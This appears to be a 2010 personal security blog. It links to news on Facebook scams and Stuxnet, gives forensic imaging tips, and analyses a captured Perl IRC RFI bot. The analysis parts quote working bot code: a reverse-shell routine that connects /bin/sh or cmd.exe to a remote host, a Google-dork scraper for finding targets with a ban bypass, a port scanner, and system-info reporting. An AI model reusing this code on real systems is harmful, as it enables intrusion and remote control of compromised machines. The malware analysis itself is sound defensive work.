Irregular Expressions


October 12, 2010  8:25 PM

Some more stuff with facebook

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

A little older post from isc.sans.edu about more ‘like’ stuff at facebook.

http://isc.sans.edu/diary.html?storyid=9556

Not exactly the same as what I previously posted, but it’s something else to read.

Sure can make facebook live up to it’s number two threat vector on the internet.

I did find a little more that is related to my last post, here is an article from sophos.  It’s not exactly the same but it uses a similar tactic to get users to click on the supplied link.

http://www.sophos.com/blogs/gc/g/2010/04/06/cheryl-cole-pictures-bait-facebook/

The choice of the age group of the targets this time is pretty clear, it should be pretty easy to get access to a lot of profiles.

October 3, 2010  12:21 AM

Something is a miss with Java Script!

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

Something strange is going around the facebooks in the last couple days, I noticed a few people posting this ‘like’ but did not pay much attention to it.

http://mashable.com/2010/10/01/warning-facebook-like-worm-spreading-through-javascript-exploit/

The story says that it does not appear to do anything bad at this point, if that is the case you would think something would be following soon with payload before it gets patched.


September 26, 2010  11:28 PM

Sans reading room

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

I like to look around the reading room from time to time looking for something to read and I found this one really interesting.

http://computer-forensics.sans.org/community/papers/examining-unknown-image-analysis-compromised-honeypot_200

Forensics is so cool :)

This has an excellent write up from start to finish.


September 26, 2010  10:54 PM

Creating sound disk images

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

What does that mean?

Creating an image that is going to have all of the information that you are going to need and persevering as much of that information as possible.

First capture a snap shot of the memory of the target, there is a lot of tools out there to do this. I prefer mdd.  If you can do that, that is great you can use tools like the volatility frame work to do your analisys. ( https://www.volatilesystems.com/default/volatility )

Once you have the memory take an image of the target disk, pull the power if you can or do the old hold the power button down for 3 seconds. Why? We want to capture everything possible, doing a shutdown will let what ever is on there clean up.

Use a tool like dd to capture the disk image, you want to make sure what ever you use will capture the slack space on the disk.  Just incase something is hiding in there.


September 26, 2010  9:57 PM

Stuxnet update

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

This article is extremely interesting.

Two quotes really sticks out

“Since reverse engineering chunks of Stuxnet’s massive code, senior US cyber security experts confirm what Mr. Langner, the German researcher, told the Monitor: Stuxnet is essentially a precision, military-grade cyber missile deployed early last year to seek out and destroy one real-world target of high importance – a target still unknown”

“Stuxnet is a 100-percent-directed cyber attack aimed at destroying an industrial process in the physical world,” says Langner, who last week became the first to publicly detail Stuxnet’s destructive purpose and its authors’ malicious intent. “This is not about espionage, as some have said. This is a 100 percent sabotage attack.”

From all of the information I can get it does seem like this is a weapon.  This is really exciting and scary at the same time.  Something is changing in the world, I don’t think this is the first time there has been weaponized software and it’s not going to be the last.

http://www.csmonitor.com/USA/2010/0921/Stuxnet-malware-is-weapon-out-to-destroy-Iran-s-Bushehr-nuclear-plant


September 26, 2010  9:10 PM

Sagan Update

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

Softwink has released an update, they are at version 0.1.5.  The rc script I created wont cut it anymore, it will have to be tweaked.

You dont need to add & on the end of the command it has a deamonize option now.

You can download it here http://sagan.softwink.com/download/

Enjoy.


September 26, 2010  8:47 PM

Casper RFI crack bot – Part 16 – Last Part

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

So looking over all of the scripts what do we have?

What is in use here is a collection of scripts by varying authors from multiple nationalities in different languages.  This in a best case scenario is a script kiddie, also by the fact that he left his gmail address in the script that was tied back to a friendster account and facebook account.  Would it be fun to friend him? Yea it would be, is it the smartest thing to do? Maybe not.  I sure would like to talk to this person and maybe get some idea of what the motivation is of the actions, or just make some more links in the community he moves in.

This was worth doing, the sites that I reported to be infected to their owners have been cleaned and it was a lot of fun!


September 26, 2010  12:50 AM

Casper RFI crack bot – Part 15

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

What this appears to be looking for is more machines to exploit, big surprise!

I followed it back for a bit and this is what I ended up with.

sub se_yahoo {
  my ($chan,$key,$nf) = @_;

sub s_engine {
    my ($f,$se,$type,$chan,$bug,$dork,$ef) = @_;

sub s_cari {
  #Type: 1 = Cari saja, 2 = Cari dan eksploit, 3 = Cari dan eksploit Joomla
  my ($chan,$dork,$nf,$bug,$type) = @_;

sub s_scanz {
  my ($to,$bug,$dork,$sb,$type,$autodom) = @_;

if    (($com =~ /^scan\s+(.+?[=])\s+(.*)/) && (fork() == 0))  { s_scanz($dtarget,$1,$2,$hb,1,1); exit;  }

So it will search for what ever is the second mach group in what is supplied.
There is also some other subs in here that are worth mentioning.

One uses a site http://md5.rednoize.com/ to try and find md5 sums.

Another does a geolocation lookup of the machine compromised from what I could tell.


September 26, 2010  12:23 AM

Casper RFI crack bot – Part 14

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

One more script listed at the top of the main one.

$filebotscan = "scan.txt";

It’s full of all sorts of stuff nothing really caught my attention until I reached this.

##[ GOOGLE ]##
sub se_google {
  my ($chan,$key,$nf) = @_;
  my @daftar;
  my $num = 50; my $max = 5000; my $p = 0;
  #my $url = "http://localhost/search/google.co.id.htm";
  my $url = "http://www.google.com/search?num=".$num."&q=".$key."&start=".$p."&sa=N";
  my $murl = "http://www.google.com";
  my $nxurl;
  my $q = bukasitus($url);
  if ( $q !~ /2010 Google/ ) { msge($chan,"Google","Baned!!"); msge($chan,"Google bypas:",$bypass."key=".$key); @daftar = se_gbypass($chan,$key,$nf); }
  if ( $q =~ /dari sekitar <b>(.+?)<\/b>/ ) {
    my $h = $1; $h =~ s/,//g; msgt($chan,"Google","$h");
  }
  if ( $q =~ /class=b><a href=\"(.*?)\">/ ) {
      my $nxurl = $1; if ($conf{showdbse} == 1){msgn($dbgchan,"Google","$nxurl");}
  }
  while ( $q =~ m/<h3 class=r><a href=\"http:\/\/(.*?)\"/g ) { push (@daftar, $1); }
  for ($p=50;$p<=$max;$p+=$num) {
    $nxurl = "http://www.google.co.id/search?num=".$num."&hl=id&q=".$key."&start=".$p."&sa=N";
    $q = bukasitus($nxurl);
    while ( $q =~ m/<h3 class=r><a href=\"http:\/\/(.*?)\"/g ) {  push (@daftar, $1);  }
    if ( $q !~ /<h3 class=r><a href=\"http:\/\/(.*?)\"/ ) { return @daftar;  }
  }
  return @daftar;
}

I wonder what this is doing? A little further down it has a section to get around getting banned from google for launching too many searches.

There is also many other search engines being used, but why?

What ever is being returned to @daftar is going into this guy.

sub lnk_sortir {
  my @unik = ();
  my %ada  = ();
  foreach my $e ( @_ ) {
    next if $ada{ $e }++;
    push (@unik, $e);
  }
  return @unik;
}

So this is returning the unique results of what ever is being given to it.

Time to take a closer look at that first sub, and what it’s putting into @daftar.

while ( $q =~ m/<h3 class=r><a href=\"http:\/\/(.*?)\"/g ) {  push (@daftar, $1);  }

That makes it easy, its pulling out URL’s of sites. But what are we looking for to get that list?


September 25, 2010  9:21 PM

Casper RFI crack bot – Part 13

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

There is a few more things that are worth looking at.

 if ($funcarg =~ /^portscan (.*)/) {
             my $hostip="$1";
             my @portas=("21","22","23","25","53","59","79","80","110","113","135","139","443","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
             my (@aberta, %porta_banner);
             foreach my $porta (@portas)  {
                my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
                if ($scansock) {
                   push (@aberta, $porta);
                   $scansock->close;
                }
             }

We can do some port scans and grab some banners :)

Here is the section for the connect back, /bin/sh or cmd.exe.

            # Conback.pl by Dominus Vis adaptada e adicionado suporte pra windows ;p
            elsif ($funcarg =~ /^conback\s+(.*)\s+(\d+)/) {
              my $host = "$1";
              my $porta = "$2";
              sendraw($IRC_cur_socket, "PRIVMSG $printl :02Conectando-se em02: $host:$porta");
              my $proto = getprotobyname('tcp');
              my $iaddr = inet_aton($host);
              my $paddr = sockaddr_in($porta, $iaddr);
              my $shell = "/bin/sh -i";
              if ($^O eq "MSWin32") {
                $shell = "cmd.exe";
              }
              socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
              connect(SOCKET, $paddr) or die "connect: $!";
              open(STDIN, ">&SOCKET");
              open(STDOUT, ">&SOCKET");
              open(STDERR, ">&SOCKET");
              system("$shell");
              close(STDIN);
              close(STDOUT);
              close(STDERR);
            }

This is handy.

           elsif ($funcarg =~ /^info/) {
           my $sysos = `uname -sr`;
           my $uptime = `uptime`;
           if ( $sysos =~ /freebsd/i ) {
           $sysname = `hostname`;
           $memory = `expr \`cat /var/run/dmesg.boot | grep "real memory" | cut -f5 -d" "\` \/ 1048576`;
           $swap = `$toploc | grep -i swap | cut -f2 -d" " | cut -f1 -d"M"`;
           chomp($memory);
           chomp($swap);
           }
           elsif ( $sysos =~ /linux/i ) {
           $sysname = `hostname -f`;
           $memory = `free -m |grep -i mem | awk '{print \$2}'`;
           $swap = `free -m |grep -i swap | awk '{print \$2}'`;
           chomp($swap);
           chomp($memory);
           }
           else {
           $sysname ="Not Found";;
           $memory ="Not found";
           $swap ="Not Found";
           }
           sendraw($IRC_cur_socket, "PRIVMSG $printl : ^C15--- ^C3[^C01 SysInfo ^C3] ^C15-------------");
           sendraw($IRC_cur_socket, "PRIVMSG $printl : ^C01os/host^C15^B;^B^C01 $sysos - $sysname ");
           sendraw($IRC_cur_socket, "PRIVMSG $printl : ^C01proc/PID^C15^B;^B^C01 $processo - $$");
           sendraw($IRC_cur_socket, "PRIVMSG $printl : ^C01uptime^C15^B;^B^C01 $uptime");
           sendraw($IRC_cur_socket, "PRIVMSG $printl : ^C01memory/swap^C15^B;^B^C01 $memory - $swap");
           sendraw($IRC_cur_socket, "PRIVMSG $printl : ^C01perl/bot^C15^B;^B^C01 $] - $VERSAO");
           sendraw($IRC_cur_socket, "PRIVMSG $printl : ^C15--- ^C3[^C01 /SysInfo ^C3] ^C15------------");
           }


Forgot Password

No problem! Submit your e-mail address below. We'll send you an e-mail containing your password.

Your password has been sent to: